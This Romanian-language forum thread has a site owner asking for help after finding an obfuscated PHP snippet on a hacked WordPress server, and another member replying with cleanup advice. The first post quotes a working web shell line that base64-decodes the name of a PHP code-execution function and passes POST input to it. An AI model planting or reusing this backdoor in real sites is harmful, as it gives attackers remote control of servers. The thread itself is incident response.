Cod base64 pe server

**Rapsodia** · 19th April 2018, 12:38

Cod PHP:


<?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['fyt']);?>abcabcabc

Am gasit asta pe server, cine trebuei sa remedieze? Firma de hosting sau ?

**Mishu** · 19th April 2018, 12:54

Nu cred ca e treaba firmei de hosting... Un cod base64 nu trebuie neaparat "remediat". Cred ca trebuie vazut ce e cu el, unde e si ce face, deci ai nevoie de un programator caruia sa ii dai full acces la fisierele tale pentru a putea urmari codul.

**Rapsodia** · 19th April 2018, 12:58

Azi a avut loc "aracul", un intreg server e infestat, de cand am scris mesajul deja lurceaza, modifica fisierele index.php ... tema e cumparat, wordpress curat... na .. ce sa zic?

**Mishu** · 19th April 2018, 13:06

In cazul asta pot rezolva cei de la hosting cu un backup total rapid.

**Rapsodia** · 19th April 2018, 13:10

Postat în original de Mishu

In cazul asta pot rezolva cei de la hosting cu un backup total rapid.

Daca ar raspunde

alta metoda nu ar fi? Adica daca ma apuc sa reinstalez eu? Ma gandesc ca daca e atacata si baza de date... slabe sanse )

**Rapsodia** · 19th April 2018, 13:12

Am aflat si de unde e buba: hacked by megla akash from Team_CC

Interesant este ca au facut si sitemap .. atacul pare a fi incepand cu ora 1:10 cu modificarea robots.txt Sitemap: http://site.info/sitemap.xml ...

**Rapsodia** · 19th April 2018, 13:38

Intrebare: daca sterg doar wordpress.-ul si pastrez baza de dare care ar fi sansele sa scap?

**Mishu** · 19th April 2018, 13:45

Poti incerca reinstalare wp, tema, module, etc. Dar cum ai zis si tu... iti ia o gramada de timp.
Daca a putut intra inseamna ca undeva ai avut o vulnerabilitate (instalare wp, tema, module). Daca e afectata si baza de date poti rezolva daca ai un backup dar e recomandat sa schimbi atat numemele bazei de date precum si prefixele tabelelor si toate parolele.

**Rapsodia** · 19th April 2018, 13:47

Postat în original de Mishu

Daca e afectata si baza de date poti rezolva daca ai un backup dar e recomandat sa schimbi atat numemele bazei de date precum si prefixele tabelelor si toate parolele.

Pai daca le schimb rezolv? Ca ma tem ca in baza de date sa nu fie injectat ceva care sa afecteze de fapt... acum ca dureaza asta este, alta varianta nu prea vad...! Ma apuc de reinstalat am doar 12 site-uri!

**Mishu** · 19th April 2018, 13:53

Postat în original de Rapsodia

Intrebare: daca sterg doar wordpress.-ul si pastrez baza de dare care ar fi sansele sa scap?

Cred ca peste 80%

Postat în original de Rapsodia

Pai daca le schimb rezolv? Ca ma tem ca in baza de date sa nu fie injectat ceva care sa afecteze de fapt... acum ca dureaza asta este, alta varianta nu prea vad...! Ma apuc de reinstalat am doar 12 site-uri!

Suna-i pe cei de la gazduire, da cumva de ei.... Modificarile de care ti-am zis au doar rolul de a-l impiedica sa intre din nou accesand aceeasi vulnerabilitate. Daca a injectat ceva in db cureti de-ti vine rau....

Subiect: Cod base64 pe server

Instrumente subiect

Afișează

Cod base64 pe server

Informații subiect

Utilizatori care navighează în acest subiect

Thread-uri Similare

Virus in base64

Google si indexarea imaginile encodate in base64

Mutare site pe alt server. Cum verific daca merge pe noul server?

PPC server

Domeniu pe un server, site-ul pe alt server

Permisiuni postare